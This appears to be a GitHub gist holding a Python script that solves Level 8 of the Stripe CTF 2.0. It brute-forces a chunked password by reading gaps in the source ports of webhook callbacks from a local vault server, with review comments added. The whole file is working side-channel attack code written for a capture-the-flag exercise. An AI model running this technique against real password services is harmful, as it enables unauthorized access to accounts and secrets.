@lukesteensen
Created December 8, 2012 20:56
Script to brute force Level 8 of the Stripe CTF 2.0
import sys
import json
import socket
import requests
from time import sleep
# set up a socket for accepting webhook responses
# IPv4 TCP listener; check_password() accepts one connection on it per attempt.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# accept() gives up after 2 seconds instead of blocking forever when no
# callback arrives.
s.settimeout(2)
# Allow the script to be restarted without waiting for the old socket to expire.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Listens on every interface. NOTE(review): the only webhook this file
# registers is 'localhost:9000', so a loopback-only bind would presumably be
# enough and would keep the port off the network - confirm before changing.
s.bind(("0.0.0.0", 9000))
s.listen(1)
# checks password with vault server at localhost:3000
# uses the socket we just set up at port 9000 for webhook
# returns difference in ports and last port used
def check_password(password, last_port):
    """Submit one candidate and report the callback's source-port gap.

    Posts ``password`` to http://localhost:3000 as JSON, naming
    'localhost:9000' as the webhook. If the reply body contains
    '"success": true', the password is printed and the process exits.
    Otherwise one connection is accepted on the module-level listener ``s``
    and closed immediately; only its source port is used.

    Returns a ``(difference, port)`` tuple: ``port`` is the source port of
    the accepted connection and ``difference`` is ``port - last_port``.

    Nothing here catches exceptions, so a failure in ``requests.post`` or a
    timeout in ``s.accept()`` propagates to the caller.
    """
    payload = json.dumps({'password': password,
                          'webhooks': ['localhost:9000']})
    response = requests.post("http://localhost:3000", data=payload)

    if '"success": true' in response.text:
        # The single-argument print(...) form emits the same line under the
        # Python 2 print statement and under Python 3.
        print(" ".join(("flag is", password)))
        sys.exit()

    # The callback's payload is never read; the peer address is the only
    # thing taken from the connection.
    conn, (_host, port) = s.accept()
    conn.close()
    return port - last_port, port
# concatenate our chunks array into a string
def cat(chunks):
    """Join the chunks into one string, each left-padded with zeros to width 3."""
    padded = []
    for value in chunks:
        padded.append(str(value).zfill(3))
    return ''.join(padded)
# Search state. The only signal this loop uses is the gap between the source
# ports of consecutive webhook callbacks, as returned by check_password().
# NOTE(review): presumably the server opens one more outbound connection for
# each correct chunk, which is why the gap grows by one. A server that made a
# constant number of backend connections per request, or randomised its
# source ports, would not expose that signal - confirm against the target.
last_port = 0    # 0 makes the first gap meaningless, so the first run is ignored
chunk = [0] * 4  # the four 3-digit chunks of the candidate password
baseline = 3     # port gap observed when no further chunk is correct
i = 0            # index of the chunk currently being searched
verify = 0       # consecutive "good" readings seen for the current value

while i < len(chunk):
    difference, last_port = check_password(cat(chunk), last_port)
    # The single-argument print(...) form emits the same line under the
    # Python 2 print statement and under Python 3.
    print(" ".join(("trying", cat(chunk), "- difference is", str(difference))))

    if difference == baseline:
        # Gap unchanged: this value is wrong, move to the next one (wraps at 1000).
        chunk[i] = (chunk[i] + 1) % 1000
        verify = 0
        continue

    if difference != baseline + 1:
        # Any other gap is treated as noise; the same candidate is retried.
        continue

    if verify <= 2:
        # Gap grew by one: repeat the same candidate until it has done so on
        # enough consecutive attempts to rule out a stray connection.
        verify += 1
        continue

    print(" ".join(("chunk", str(i), "is", str(chunk[i]))))
    i += 1
    baseline += 1  # later chunks are judged against the larger gap
    verify = 0